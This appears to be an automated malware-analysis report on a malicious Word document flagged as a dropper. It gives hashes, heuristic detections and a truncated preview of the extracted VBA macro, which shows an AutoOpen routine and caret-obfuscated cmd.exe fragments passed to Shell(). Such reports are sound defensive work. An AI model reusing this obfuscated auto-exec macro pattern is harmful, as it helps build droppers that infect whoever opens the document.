Office (OLE) malware analysis — malicious · 18b3872a5e7ab2fd

MALICIOUS

Office (OLE)

113.5 KB Created: 2018-06-04 05:07:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: b77422f1a36d53e352f24be3ec726236 SHA-1: 3309b3f7cc4ddb2fc2304d3ccfeb2fc38940915a SHA-256: 18b3872a5e7ab2fddf9123b58e4378bcdaf1d7d94e3e0c723382948ca2f17c79

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine triggers the ZkIovX function, which uses the Shell() function to execute a command. This function appears to be constructing a command line from various variables and concatenating strings, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6571989-0' further supports its role as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6571989-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6571989-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18812 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18812 bytes
SHA-256: `472bd6293df97bafcb45334aeafdd4ae375943ece75ddf717e33882558ef5977`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "THTwsNQcNh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ZkIovX() On Error Resume Next For ZZtizc = GmVsi To 92521 sFwsq = (rmtfo - ChrW(45616 * 82450) * CDfqr * CInt(VjLAiA + Sqr(69118)) + 42343 - 49452 / 55621 - CDate(tIFjHf - 45867 + 30394 - Hex(tnfNu / 50206)) + (DDjqBr * Tan(vJtvJ))) Next For aVMQqv = lcuYH To 52284 AiDzGI = (jSqmn - ChrW(2632 * 12229) * XNjOZ * CInt(XbOXzL + Sqr(99775)) + 52196 - 17807 / 20858 - CDate(aPCNFv - 78997 + 2018 - Hex(uDViDt / 16289)) + (FjotBn * Tan(HpaHzO))) Next ZkIovX = ssCTKKIf + Shell(KpiUXirB + Chr(fDQVTzFlZw + vbKeyC + XRFjdqA) + nntasMB + vFmzhO + lTanS + lvMqirfr + FianJj + hVUTfwz + EpFihnnTn, diqzBvlEvt + 0 + vsGBPTJXYF) For IfEMl = vRRuN To 97374 UFkUFC = (VcWpZ - ChrW(54931 * 48234) * QVhDM * CInt(uqaqIE + Sqr(63930)) + 76999 - 28658 / 87524 - CDate(CtIBFF - 3719 + 89293 - Hex(jjJOnI / 60106)) + (BwMJmE * Tan(PKdww))) Next End Function Sub Autoopen() On Error Resume Next For hNcIWi = ELPfJ To 39880 OjLDz = (smSjW - ChrW(31626 * 79719) * mvbFvB * CInt(SjGQZ + Sqr(28709)) + 68848 - 80900 / 61910 - CDate(ARzLiw - 51514 + 94427 - Hex(zuuwm / 11802)) + (hSQnaN * Tan(EvAFm))) Next ZkIovX For JIwmz = wrXEw To 2303 VEHYj = (KjhRZ - ChrW(85064 * 11854) * wtQhto * CInt(PowIw + Sqr(29325)) + 13862 - 3726 / 18459 - CDate(TmSrO - 94666 + 44756 - Hex(lbtcr / 43810)) + (tkAwHW * Tan(MkGPJ))) Next End Sub Attribute VB_Name = "nEDiYDGFn" Function nntasMB() On Error Resume Next For QHloj = zUwUo To 28293 hPZcc = (KhsDui - ChrW(95304 * 74703) * EvuuVM * CInt(BTOcrn + Sqr(20859)) + 16739 - 99346 / 5632 - CDate(PRtEVS - 36590 + 35412 - Hex(XEqKj / 47124)) + (QBZts * Tan(qOGNzF))) Next wFqcO = "md VwplwTjVSa" + "nff NVaXENuBoUT" + "EGB" + "iiiT" + "ZsR" + "Vz" + "bJLSE wtOidREII" For WjDrq = Vqzabb To 6590 SwcEtT = (uHZJv - ChrW(41416 * 50727) * zHSNvv * CInt(AzTBCZ + Sqr(31832)) + 51445 - 96540 / 33574 - CDate(AXRdIG - 73775 + 98241 - Hex(cdhvMv / 22653)) + (SIOIw * Tan(wdlsQw))) Next UWWkpbwH = "jw & " + " %^c^o^m^S^p^E" + "^c^% " + " %^c^o^m^S^p" For jbsFVC = UzMbw To 36120 WRYoH = (OIpDh - ChrW(3326 * 85839) * zXNVA * CInt(vCpprs + Sqr(97927)) + 65355 - 37147 / 92471 - CDate(LfTaMM - 7195 + 17081 - Hex(PYmpYT / 19034)) + (UbzFvT * Tan(UbizO))) Next aKUvcLKzdV = "^E^c^% /V" + " " + " /c " + " set %" For jotPV = YunKJ To 25082 jWQAR = (iHNrz - ChrW(66016 * 30847) * DGliF * CInt(VijsZC + Sqr(95338)) + 71275 - 94466 / 62918 - CDate(psfks - 7721 + 51722 - Hex(afHSz / 92958)) + (FKUoCj * Tan(SuAnX))) Next FccrbhHUT = "TIVSt" + "NibnsJMFFv%=dvu" + "BbzH&&set" + " %PG" + "MqAzsbqTEKX%=p" + "&&" + "set" For PZzJha = qkbLC To 19603 fOOQm = (swnQIi - ChrW(70292 * 71675) * lkFjz * CInt(AizlW + Sqr(77826)) + 82695 - 40996 / 67431 - CDate(msTYE - 61524 + 69433 - Hex(aiSmh / 2443)) + (qWRwr * Tan(VKLff))) Next RDEztEzuizp = " %tbij" + "akMCF%=o^w&&set" + " %YaqXXcaZ" + "VnbZJzf%" + "=wdqQomh" + "IdhRb&&set %OWk" + "Yqzw%=!" + "%PG" For iPIBb = GWmRN To 38875 AEGRj = (AwijR - ChrW(49632 * 43081) * EQhIsY * CInt(FlShq + Sqr(65970)) + 52309 - 58996 / 31922 - CDate(JwtqB - 29592 + 86480 - Hex(RfTwjq / 52884)) + (MCFEJ * Tan(vpuTn))) Next QEHVHw = "MqAzsbqTEKX%" + "!&&set %NOiWVAw" + "sCqKzNSo%=i" + "fmAwNwXl" + "h&" + "&set %zOkzT" + "jOqn%=e^r&&s" + "et %" For sfZRSH = ccBDB To 78776 btvJBc = (lWYYM - ChrW(30309 * 79320) * DwhbJ * CInt(mGCdbh + Sqr(97445)) + 53939 - 21499 / 98222 - CDate(PctBu - 72076 + 33481 - Hex(iHJAt / 11172)) + (TbZEVZ * Tan(wontfa))) Next MzGfWhUGZ = "SssTTpdvC%=!" + "%tbijakMCF%!&&s" + "et %qDchRI" + "rTil" + "YU%=s&&s" + "et %TlsitpLzMG" For HJKZUz = wzJKQR To 59504 cFJYjO = (CGdfj - ChrW(56958 * 8158) * BGrQW * CInt(waYIEW + Sqr(52288)) + 31572 - 88611 / 1 ... (truncated)

SHA-256: 472bd6293df97bafcb45334aeafdd4ae375943ece75ddf717e33882558ef5977

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "THTwsNQcNh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ZkIovX()
On Error Resume Next
For ZZtizc = GmVsi To 92521
         sFwsq = (rmtfo - ChrW(45616 * 82450) * CDfqr * CInt(VjLAiA + Sqr(69118)) + 42343 - 49452 / 55621 - CDate(tIFjHf - 45867 + 30394 - Hex(tnfNu / 50206)) + (DDjqBr * Tan(vJtvJ)))
Next
For aVMQqv = lcuYH To 52284
         AiDzGI = (jSqmn - ChrW(2632 * 12229) * XNjOZ * CInt(XbOXzL + Sqr(99775)) + 52196 - 17807 / 20858 - CDate(aPCNFv - 78997 + 2018 - Hex(uDViDt / 16289)) + (FjotBn * Tan(HpaHzO)))
Next
ZkIovX = ssCTKKIf + Shell(KpiUXirB + Chr(fDQVTzFlZw + vbKeyC + XRFjdqA) + nntasMB + vFmzhO + lTanS + lvMqirfr + FianJj + hVUTfwz + EpFihnnTn, diqzBvlEvt + 0 + vsGBPTJXYF)
For IfEMl = vRRuN To 97374
         UFkUFC = (VcWpZ - ChrW(54931 * 48234) * QVhDM * CInt(uqaqIE + Sqr(63930)) + 76999 - 28658 / 87524 - CDate(CtIBFF - 3719 + 89293 - Hex(jjJOnI / 60106)) + (BwMJmE * Tan(PKdww)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For hNcIWi = ELPfJ To 39880
         OjLDz = (smSjW - ChrW(31626 * 79719) * mvbFvB * CInt(SjGQZ + Sqr(28709)) + 68848 - 80900 / 61910 - CDate(ARzLiw - 51514 + 94427 - Hex(zuuwm / 11802)) + (hSQnaN * Tan(EvAFm)))
Next
ZkIovX
For JIwmz = wrXEw To 2303
         VEHYj = (KjhRZ - ChrW(85064 * 11854) * wtQhto * CInt(PowIw + Sqr(29325)) + 13862 - 3726 / 18459 - CDate(TmSrO - 94666 + 44756 - Hex(lbtcr / 43810)) + (tkAwHW * Tan(MkGPJ)))
Next
End Sub


Attribute VB_Name = "nEDiYDGFn"
Function nntasMB()
On Error Resume Next
For QHloj = zUwUo To 28293
         hPZcc = (KhsDui - ChrW(95304 * 74703) * EvuuVM * CInt(BTOcrn + Sqr(20859)) + 16739 - 99346 / 5632 - CDate(PRtEVS - 36590 + 35412 - Hex(XEqKj / 47124)) + (QBZts * Tan(qOGNzF)))
Next
wFqcO = "md VwplwTjVSa" + "nff NVaXENuBoUT" + "EGB" + "iiiT" + "ZsR" + "Vz" + "bJLSE wtOidREII"
For WjDrq = Vqzabb To 6590
         SwcEtT = (uHZJv - ChrW(41416 * 50727) * zHSNvv * CInt(AzTBCZ + Sqr(31832)) + 51445 - 96540 / 33574 - CDate(AXRdIG - 73775 + 98241 - Hex(cdhvMv / 22653)) + (SIOIw * Tan(wdlsQw)))
Next
UWWkpbwH = "jw &   " + "  %^c^o^m^S^p^E" + "^c^%   " + "  %^c^o^m^S^p"
For jbsFVC = UzMbw To 36120
         WRYoH = (OIpDh - ChrW(3326 * 85839) * zXNVA * CInt(vCpprs + Sqr(97927)) + 65355 - 37147 / 92471 - CDate(LfTaMM - 7195 + 17081 - Hex(PYmpYT / 19034)) + (UbzFvT * Tan(UbizO)))
Next
aKUvcLKzdV = "^E^c^%     /V" + "        " + " /c " + "          set %"
For jotPV = YunKJ To 25082
         jWQAR = (iHNrz - ChrW(66016 * 30847) * DGliF * CInt(VijsZC + Sqr(95338)) + 71275 - 94466 / 62918 - CDate(psfks - 7721 + 51722 - Hex(afHSz / 92958)) + (FKUoCj * Tan(SuAnX)))
Next
FccrbhHUT = "TIVSt" + "NibnsJMFFv%=dvu" + "BbzH&&set" + " %PG" + "MqAzsbqTEKX%=p" + "&&" + "set"
For PZzJha = qkbLC To 19603
         fOOQm = (swnQIi - ChrW(70292 * 71675) * lkFjz * CInt(AizlW + Sqr(77826)) + 82695 - 40996 / 67431 - CDate(msTYE - 61524 + 69433 - Hex(aiSmh / 2443)) + (qWRwr * Tan(VKLff)))
Next
RDEztEzuizp = " %tbij" + "akMCF%=o^w&&set" + " %YaqXXcaZ" + "VnbZJzf%" + "=wdqQomh" + "IdhRb&&set %OWk" + "Yqzw%=!" + "%PG"
For iPIBb = GWmRN To 38875
         AEGRj = (AwijR - ChrW(49632 * 43081) * EQhIsY * CInt(FlShq + Sqr(65970)) + 52309 - 58996 / 31922 - CDate(JwtqB - 29592 + 86480 - Hex(RfTwjq / 52884)) + (MCFEJ * Tan(vpuTn)))
Next
QEHVHw = "MqAzsbqTEKX%" + "!&&set %NOiWVAw" + "sCqKzNSo%=i" + "fmAwNwXl" + "h&" + "&set %zOkzT" + "jOqn%=e^r&&s" + "et %"
For sfZRSH = ccBDB To 78776
         btvJBc = (lWYYM - ChrW(30309 * 79320) * DwhbJ * CInt(mGCdbh + Sqr(97445)) + 53939 - 21499 / 98222 - CDate(PctBu - 72076 + 33481 - Hex(iHJAt / 11172)) + (TbZEVZ * Tan(wontfa)))
Next
MzGfWhUGZ = "SssTTpdvC%=!" + "%tbijakMCF%!&&s" + "et %qDchRI" + "rTil" + "YU%=s&&s" + "et %TlsitpLzMG"
For HJKZUz = wzJKQR To 59504
         cFJYjO = (CGdfj - ChrW(56958 * 8158) * BGrQW * CInt(waYIEW + Sqr(52288)) + 31572 - 88611 / 1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.